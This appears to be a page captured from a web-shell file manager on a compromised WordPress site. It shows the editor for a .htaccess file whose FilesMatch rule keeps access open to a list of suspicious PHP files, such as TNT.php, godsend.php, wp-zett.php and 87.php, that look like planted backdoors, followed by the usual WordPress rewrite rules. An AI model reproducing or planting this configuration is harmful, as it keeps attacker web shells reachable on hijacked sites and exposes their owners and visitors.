Edit file File name : .htaccess Content :<FilesMatch "^(index.php|geju.php|plugin-install.php|cong.php|about.php|hiroshi.php|fun.php|kajisak.php|wp-admin.php|TNT.php|trust.php|godsend.php|bak.php|wp-login.php|a.php|wp-zett.php|LV.php|content.php|87.php)$"> Order Allow,Deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>Save